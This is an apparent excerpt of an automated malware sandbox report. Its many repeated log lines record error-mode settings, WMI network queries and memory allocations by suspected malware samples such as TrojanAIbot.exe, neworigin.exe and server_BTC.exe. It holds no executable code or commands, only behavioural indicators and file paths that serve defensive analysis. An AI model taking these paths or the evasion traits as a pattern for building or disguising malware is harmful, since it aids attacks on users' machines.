                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 1210000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 4D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: C40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2770000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2510000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1330000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2FD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2E90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2440000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2440000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: C20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: C20000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 1760000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 3570000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 3270000 memory reserve | memory write watch
